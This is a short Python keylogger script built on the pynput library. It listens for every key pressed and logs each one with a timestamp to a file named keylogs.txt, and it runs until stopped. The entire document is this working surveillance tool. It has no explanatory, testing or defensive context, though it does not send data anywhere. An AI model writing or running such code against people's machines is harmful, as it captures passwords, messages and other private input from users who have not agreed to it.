#!/bin/python3

from pynput.keyboard import Listener, Key
import logging

log = ""

logging.basicConfig(filename=(log + "keylogs.txt"), \
	level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
